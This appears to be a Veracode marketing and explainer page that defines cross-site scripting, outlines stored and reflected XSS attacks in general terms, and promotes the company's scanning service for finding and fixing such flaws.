XSSXSS - Cross-Site Scripting DefinedXSS, or cross-site scripting, is a type of web application security vulnerability which occurs when an attacker uses a legitimate web application to send malicous code to other users. XSS attacks can take place when a web application utilizes user-supplied input as part of a web page's content without validating or encoding the data. This allows attackers to inject malicious scripts into the web application which an unsuspecting user's browser will execute because it appears to be coming from the "trusted" website. The attacker can then gain access to session tokens, cookies, sensitive user data and other objects that the browser is using withing the website. According to the Open Web Application Security Project (OWASP), XSS is now the most prevalent type of web security vulnerability. Recent XSS attacks have ranged in severity from defacement, such as redirecting users from Barack Obama's campaign website to Hillary Clinton's website, issues within popular open source platforms, to identity and credit card theft, such as tricking users on PayPal's website into providing sensitive data. Anatomy of XSS AttacksWith over 25% of all web vulnerabilities being attributed to XSS, this is the most common software vulnerability and should be top of mind for web developers and security personnel. In general, XSS attacks are created in two ways. First, a malicious user may enter a script on the vulnerable website which is then visible on pages that other users will visit, such as a blog posting, message board, or comment field. When a user views the compromised page, their browser will execute the malicious script. The second form of XSS is commonly called a "reflective" attack. A reflected attack is delivered by embedding malicious content in an email or image, and when clicked by the user, the code is posted to the vulnerable website causing the user's browser to execute the malicious content. Regardless of the method used to launch an XSS attack, the result is the same - the user's browser will execute malicious code created by the attacker because it is coming from the "trusted" website. Finding and Remediating XSS Vulnerabilities with VeracodeVeracode's SecurityReview enables organizations to quickly identify and remediate XSS security vulnerabilities in web applications. Veracode uses static binary analysis and dynamic vulnerability scanning to model web applications, locate all user inputs and determine if the input can be used to exploit a XSS vulnerability. Unlike other approaches which simply look for software versions that are known to have XSS vulnerabilities, Veracode exercises each input with data testing to fully assess each potential attack vector. And because Veracode uses non-destructive input testing methods, the technique can be used on "live" websites without causing harm to users, data or performance. Once an XSS vulnerability is detected, organizations are provided with remediation details such as location of vulnerability, data used to create the exploit and steps to properly sanitize the input to remediate the problem. Application developers should always sanitize user inputs before using them in dynamically generated content and a detailed technical guide with coding examples is available on the Common Weakness Enumeration (CWE) website. |
